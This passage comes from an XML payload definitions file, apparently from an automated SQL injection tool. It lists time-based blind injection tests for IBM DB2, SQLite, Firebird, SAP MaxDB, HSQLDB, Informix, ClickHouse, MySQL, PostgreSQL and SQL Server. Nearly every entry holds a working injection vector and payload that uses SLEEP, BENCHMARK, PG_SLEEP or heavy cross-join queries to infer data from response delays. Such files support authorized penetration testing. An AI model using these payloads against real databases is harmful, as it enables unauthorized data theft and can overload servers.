T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>942<request>943<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>944</request>945<response>946<time>[DELAYED]</time>947</response>948<details>949<dbms>IBM DB2</dbms>950</details>951</test>952953<test>954<title>IBM DB2 OR time-based blind (heavy query)</title>955<stype>5</stype>956<level>3</level>957<risk>3</risk>958<clause>1,2,3,9</clause>959<where>1</where>960<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>961<request>962<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>963</request>964<response>965<time>[DELAYED]</time>966</response>967<details>968<dbms>IBM DB2</dbms>969</details>970</test>971972<test>973<title>IBM DB2 AND time-based blind (heavy query - comment)</title>974<stype>5</stype>975<level>5</level>976<risk>2</risk>977<clause>1,2,3,9</clause>978<where>1</where>979<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>980<request>981<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>982<comment>--</comment>983</request>984<response>985<time>[DELAYED]</time>986</response>987<details>988<dbms>IBM DB2</dbms>989</details>990</test>991992<test>993<title>IBM DB2 OR time-based blind (heavy query - comment)</title>994<stype>5</stype>995<level>5</level>996<risk>3</risk>997<clause>1,2,3,9</clause>998<where>1</where>999<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>1000<request>1001<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>1002<comment>--</comment>1003</request>1004<response>1005<time>[DELAYED]</time>1006</response>1007<details>1008<dbms>IBM DB2</dbms>1009</details>1010</test>10111012<test>1013<title>SQLite > 2.0 AND time-based blind (heavy query)</title>1014<stype>5</stype>1015<level>3</level>1016<risk>2</risk>1017<clause>1,8,9</clause>1018<where>1</where>1019<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>1020<request>1021<payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>1022</request>1023<response>1024<time>[DELAYED]</time>1025</response>1026<details>1027<dbms>SQLite</dbms>1028<dbms_version>> 2.0</dbms_version>1029</details>1030</test>10311032<test>1033<title>SQLite > 2.0 OR time-based blind (heavy query)</title>1034<stype>5</stype>1035<level>3</level>1036<risk>3</risk>1037<clause>1,9</clause>1038<where>1</where>1039<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>1040<request>1041<payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>1042</request>1043<response>1044<time>[DELAYED]</time>1045</response>1046<details>1047<dbms>SQLite</dbms>1048<dbms_version>> 2.0</dbms_version>1049</details>1050</test>10511052<test>1053<title>SQLite > 2.0 AND time-based blind (heavy query - comment)</title>1054<stype>5</stype>1055<level>5</level>1056<risk>2</risk>1057<clause>1,9</clause>1058<where>1</where>1059<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>1060<request>1061<payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>1062<comment>--</comment>1063</request>1064<response>1065<time>[DELAYED]</time>1066</response>1067<details>1068<dbms>SQLite</dbms>1069<dbms_version>> 2.0</dbms_version>1070</details>1071</test>10721073<test>1074<title>SQLite > 2.0 OR time-based blind (heavy query - comment)</title>1075<stype>5</stype>1076<level>5</level>1077<risk>3</risk>1078<clause>1,9</clause>1079<where>1</where>1080<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>1081<request>1082<payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>1083<comment>--</comment>1084</request>1085<response>1086<time>[DELAYED]</time>1087</response>1088<details>1089<dbms>SQLite</dbms>1090<dbms_version>> 2.0</dbms_version>1091</details>1092</test>10931094<test>1095<title>Firebird >= 2.0 AND time-based blind (heavy query)</title>1096<stype>5</stype>1097<level>4</level>1098<risk>2</risk>1099<clause>1,9</clause>1100<where>1</where>1101<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>1102<request>1103<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>1104</request>1105<response>1106<time>[DELAYED]</time>1107</response>1108<details>1109<dbms>Firebird</dbms>1110<dbms_version>>= 2.0</dbms_version>1111</details>1112</test>11131114<test>1115<title>Firebird >= 2.0 OR time-based blind (heavy query)</title>1116<stype>5</stype>1117<level>4</level>1118<risk>3</risk>1119<clause>1,9</clause>1120<where>1</where>1121<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>1122<request>1123<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>1124</request>1125<response>1126<time>[DELAYED]</time>1127</response>1128<details>1129<dbms>Firebird</dbms>1130<dbms_version>>= 2.0</dbms_version>1131</details>1132</test>11331134<test>1135<title>Firebird >= 2.0 AND time-based blind (heavy query - comment)</title>1136<stype>5</stype>1137<level>5</level>1138<risk>2</risk>1139<clause>1,9</clause>1140<where>1</where>1141<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>1142<request>1143<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>1144<comment>--</comment>1145</request>1146<response>1147<time>[DELAYED]</time>1148</response>1149<details>1150<dbms>Firebird</dbms>1151<dbms_version>>= 2.0</dbms_version>1152</details>1153</test>11541155<test>1156<title>Firebird >= 2.0 OR time-based blind (heavy query - comment)</title>1157<stype>5</stype>1158<level>5</level>1159<risk>3</risk>1160<clause>1,9</clause>1161<where>1</where>1162<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>1163<request>1164<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>1165<comment>--</comment>1166</request>1167<response>1168<time>[DELAYED]</time>1169</response>1170<details>1171<dbms>Firebird</dbms>1172<dbms_version>>= 2.0</dbms_version>1173</details>1174</test>11751176<test>1177<title>SAP MaxDB AND time-based blind (heavy query)</title>1178<stype>5</stype>1179<level>4</level>1180<risk>2</risk>1181<clause>1,2,3,9</clause>1182<where>1</where>1183<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>1184<request>1185<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>1186</request>1187<response>1188<time>[DELAYED]</time>1189</response>1190<details>1191<dbms>SAP MaxDB</dbms>1192</details>1193</test>11941195<test>1196<title>SAP MaxDB OR time-based blind (heavy query)</title>1197<stype>5</stype>1198<level>4</level>1199<risk>3</risk>1200<clause>1,2,3,9</clause>1201<where>1</where>1202<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>1203<request>1204<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>1205</request>1206<response>1207<time>[DELAYED]</time>1208</response>1209<details>1210<dbms>SAP MaxDB</dbms>1211</details>1212</test>12131214<test>1215<title>SAP MaxDB AND time-based blind (heavy query - comment)</title>1216<stype>5</stype>1217<level>5</level>1218<risk>2</risk>1219<clause>1,2,3,9</clause>1220<where>1</where>1221<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>1222<request>1223<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>1224<comment>--</comment>1225</request>1226<response>1227<time>[DELAYED]</time>1228</response>1229<details>1230<dbms>SAP MaxDB</dbms>1231</details>1232</test>12331234<test>1235<title>SAP MaxDB OR time-based blind (heavy query - comment)</title>1236<stype>5</stype>1237<level>5</level>1238<risk>3</risk>1239<clause>1,2,3,9</clause>1240<where>1</where>1241<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>1242<request>1243<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>1244<comment>--</comment>1245</request>1246<response>1247<time>[DELAYED]</time>1248</response>1249<details>1250<dbms>SAP MaxDB</dbms>1251</details>1252</test>12531254<test>1255<title>HSQLDB >= 1.7.2 AND time-based blind (heavy query)</title>1256<stype>5</stype>1257<level>4</level>1258<risk>2</risk>1259<clause>1,2,3,9</clause>1260<where>1</where>1261<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1262<request>1263<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1264</request>1265<response>1266<time>[SLEEPTIME]</time>1267</response>1268<details>1269<dbms>HSQLDB</dbms>1270<dbms_version>>= 1.7.2</dbms_version>1271</details>1272</test>12731274<test>1275<title>HSQLDB >= 1.7.2 OR time-based blind (heavy query)</title>1276<stype>5</stype>1277<level>4</level>1278<risk>3</risk>1279<clause>1,2,3,9</clause>1280<where>1</where>1281<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1282<request>1283<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1284</request>1285<response>1286<time>[SLEEPTIME]</time>1287</response>1288<details>1289<dbms>HSQLDB</dbms>1290<dbms_version>>= 1.7.2</dbms_version>1291</details>1292</test>12931294<test>1295<title>HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)</title>1296<stype>5</stype>1297<level>5</level>1298<risk>2</risk>1299<clause>1,2,3,9</clause>1300<where>1</where>1301<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1302<request>1303<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1304<comment>--</comment>1305</request>1306<response>1307<time>[DELAYED]</time>1308</response>1309<details>1310<dbms>HSQLDB</dbms>1311<dbms_version>>= 1.7.2</dbms_version>1312</details>1313</test>13141315<test>1316<title>HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)</title>1317<stype>5</stype>1318<level>5</level>1319<risk>3</risk>1320<clause>1,2,3,9</clause>1321<where>1</where>1322<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1323<request>1324<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1325<comment>--</comment>1326</request>1327<response>1328<time>[DELAYED]</time>1329</response>1330<details>1331<dbms>HSQLDB</dbms>1332<dbms_version>>= 1.7.2</dbms_version>1333</details>1334</test>13351336<test>1337<title>HSQLDB > 2.0 AND time-based blind (heavy query)</title>1338<stype>5</stype>1339<level>4</level>1340<risk>2</risk>1341<clause>1,2,3,9</clause>1342<where>1</where>1343<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1344<request>1345<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1346</request>1347<response>1348<time>[SLEEPTIME]</time>1349</response>1350<details>1351<dbms>HSQLDB</dbms>1352<dbms_version>> 2.0</dbms_version>1353</details>1354</test>13551356<test>1357<title>HSQLDB > 2.0 OR time-based blind (heavy query)</title>1358<stype>5</stype>1359<level>4</level>1360<risk>3</risk>1361<clause>1,2,3,9</clause>1362<where>1</where>1363<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1364<request>1365<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1366</request>1367<response>1368<time>[SLEEPTIME]</time>1369</response>1370<details>1371<dbms>HSQLDB</dbms>1372<dbms_version>> 2.0</dbms_version>1373</details>1374</test>13751376<test>1377<title>HSQLDB > 2.0 AND time-based blind (heavy query - comment)</title>1378<stype>5</stype>1379<level>5</level>1380<risk>2</risk>1381<clause>1,2,3,9</clause>1382<where>1</where>1383<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1384<request>1385<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1386<comment>--</comment>1387</request>1388<response>1389<time>[DELAYED]</time>1390</response>1391<details>1392<dbms>HSQLDB</dbms>1393<dbms_version>> 2.0</dbms_version>1394</details>1395</test>13961397<test>1398<title>HSQLDB > 2.0 OR time-based blind (heavy query - comment)</title>1399<stype>5</stype>1400<level>5</level>1401<risk>3</risk>1402<clause>1,2,3,9</clause>1403<where>1</where>1404<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1405<request>1406<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1407<comment>--</comment>1408</request>1409<response>1410<time>[DELAYED]</time>1411</response>1412<details>1413<dbms>HSQLDB</dbms>1414<dbms_version>> 2.0</dbms_version>1415</details>1416</test>14171418<test>1419<title>Informix AND time-based blind (heavy query)</title>1420<stype>5</stype>1421<level>2</level>1422<risk>2</risk>1423<clause>1,2,3,9</clause>1424<where>1</where>1425<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1426<request>1427<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1428</request>1429<response>1430<time>[DELAYED]</time>1431</response>1432<details>1433<dbms>Informix</dbms>1434</details>1435</test>14361437<test>1438<title>Informix OR time-based blind (heavy query)</title>1439<stype>5</stype>1440<level>2</level>1441<risk>3</risk>1442<clause>1,2,3,9</clause>1443<where>1</where>1444<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1445<request>1446<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1447</request>1448<response>1449<time>[DELAYED]</time>1450</response>1451<details>1452<dbms>Informix</dbms>1453</details>1454</test>14551456<test>1457<title>Informix AND time-based blind (heavy query - comment)</title>1458<stype>5</stype>1459<level>5</level>1460<risk>2</risk>1461<clause>1,2,3,9</clause>1462<where>1</where>1463<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1464<request>1465<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1466<comment>--</comment>1467</request>1468<response>1469<time>[DELAYED]</time>1470</response>1471<details>1472<dbms>Informix</dbms>1473</details>1474</test>14751476<test>1477<title>Informix OR time-based blind (heavy query - comment)</title>1478<stype>5</stype>1479<level>5</level>1480<risk>3</risk>1481<clause>1,2,3,9</clause>1482<where>1</where>1483<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1484<request>1485<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1486<comment>--</comment>1487</request>1488<response>1489<time>[DELAYED]</time>1490</response>1491<details>1492<dbms>Informix</dbms>1493</details>1494</test>14951496<test>1497<title>ClickHouse AND time-based blind (heavy query)</title>1498<stype>5</stype>1499<level>4</level>1500<risk>1</risk>1501<clause>1,2,3</clause>1502<where>1</where>1503<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>1504<request>1505<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>1506</request>1507<response>1508<time>[DELAYED]</time>1509</response>1510<details>1511<dbms>ClickHouse</dbms>1512</details>1513</test>15141515<test>1516<title>ClickHouse OR time-based blind (heavy query)</title>1517<stype>5</stype>1518<level>5</level>1519<risk>3</risk>1520<clause>1,2,3</clause>1521<where>1</where>1522<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>1523<request>1524<payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>1525</request>1526<response>1527<time>[DELAYED]</time>1528</response>1529<details>1530<dbms>ClickHouse</dbms>1531</details>1532</test>15331534<!-- End of time-based boolean tests -->15351536<!-- Time-based boolean tests - Numerous clauses -->1537<!-- This payload does not work with SLEEP() -->1538<test>1539<title>MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>1540<stype>5</stype>1541<level>3</level>1542<risk>2</risk>1543<clause>1,2,3,4,5</clause>1544<where>1</where>1545<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>1546<request>1547<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>1548</request>1549<response>1550<time>[SLEEPTIME]</time>1551</response>1552<details>1553<dbms>MySQL</dbms>1554<dbms_version>>= 5.0.12</dbms_version>1555</details>1556</test>15571558<test>1559<title>MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>1560<stype>5</stype>1561<level>5</level>1562<risk>2</risk>1563<clause>1,2,3,4,5</clause>1564<where>1</where>1565<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>1566<request>1567<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>1568<comment>#</comment>1569</request>1570<response>1571<time>[SLEEPTIME]</time>1572</response>1573<details>1574<dbms>MySQL</dbms>1575<dbms_version>>= 5.0.12</dbms_version>1576</details>1577</test>1578<!-- End of time-based boolean tests - Numerous clauses -->15791580<!-- Time-based boolean tests - Parameter replace -->1581<test>1582<title>MySQL >= 5.0.12 time-based blind - Parameter replace</title>1583<stype>5</stype>1584<level>2</level>1585<risk>1</risk>1586<clause>1,2,3,9</clause>1587<where>3</where>1588<vector>(CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector>1589<request>1590<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload>1591</request>1592<response>1593<time>[SLEEPTIME]</time>1594</response>1595<details>1596<dbms>MySQL</dbms>1597<dbms_version>>= 5.0.12</dbms_version>1598</details>1599</test>16001601<test>1602<title>MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)</title>1603<stype>5</stype>1604<level>3</level>1605<risk>1</risk>1606<clause>1,2,3,9</clause>1607<where>3</where>1608<vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>1609<request>1610<payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>1611</request>1612<response>1613<time>[SLEEPTIME]</time>1614</response>1615<details>1616<dbms>MySQL</dbms>1617<dbms_version>>= 5.0.12</dbms_version>1618</details>1619</test>16201621<test>1622<title>MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)</title>1623<stype>5</stype>1624<level>4</level>1625<risk>2</risk>1626<clause>1,2,3,9</clause>1627<where>3</where>1628<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector>1629<request>1630<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload>1631</request>1632<response>1633<time>[DELAYED]</time>1634</response>1635<details>1636<dbms>MySQL</dbms>1637<dbms_version>< 5.0.12</dbms_version>1638</details>1639</test>16401641<test>1642<title>MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>1643<stype>5</stype>1644<level>5</level>1645<risk>2</risk>1646<clause>1,2,3,9</clause>1647<where>3</where>1648<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>1649<request>1650<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>1651</request>1652<response>1653<time>[DELAYED]</time>1654</response>1655<details>1656<dbms>MySQL</dbms>1657<dbms_version>> 5.0.12</dbms_version>1658</details>1659</test>16601661<test>1662<title>MySQL time-based blind - Parameter replace (bool)</title>1663<stype>5</stype>1664<level>4</level>1665<risk>1</risk>1666<clause>1,2,3,9</clause>1667<where>3</where>1668<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>1669<request>1670<payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>1671</request>1672<response>1673<time>[SLEEPTIME]</time>1674</response>1675<details>1676<dbms>MySQL</dbms>1677</details>1678</test>16791680<test>1681<title>MySQL time-based blind - Parameter replace (ELT)</title>1682<stype>5</stype>1683<level>5</level>1684<risk>1</risk>1685<clause>1,2,3,9</clause>1686<where>3</where>1687<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>1688<request>1689<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>1690</request>1691<response>1692<time>[SLEEPTIME]</time>1693</response>1694<details>1695<dbms>MySQL</dbms>1696</details>1697</test>16981699<test>1700<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>1701<stype>5</stype>1702<level>5</level>1703<risk>1</risk>1704<clause>1,2,3,9</clause>1705<where>3</where>1706<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>1707<request>1708<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>1709</request>1710<response>1711<time>[SLEEPTIME]</time>1712</response>1713<details>1714<dbms>MySQL</dbms>1715</details>1716</test>17171718<test>1719<title>PostgreSQL > 8.1 time-based blind - Parameter replace</title>1720<stype>5</stype>1721<level>3</level>1722<risk>1</risk>1723<clause>1,2,3,9</clause>1724<where>3</where>1725<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>1726<request>1727<payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>1728</request>1729<response>1730<time>[SLEEPTIME]</time>1731</response>1732<details>1733<dbms>PostgreSQL</dbms>1734<dbms_version>> 8.1</dbms_version>1735</details>1736</test>17371738<test>1739<title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>1740<stype>5</stype>1741<level>4</level>1742<risk>2</risk>1743<clause>1,2,3,9</clause>1744<where>3</where>1745<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>1746<request>1747<payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>1748</request>1749<response>1750<time>[DELAYED]</time>1751</response>1752<details>1753<dbms>PostgreSQL</dbms>1754</details>1755</test>17561757<test>1758<title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>1759<stype>5</stype>1760<level>4</level>1761<risk>2</risk>1762<clause>1,3,9</clause>1763<where>3</where>1764<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>1765<request>1766<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT 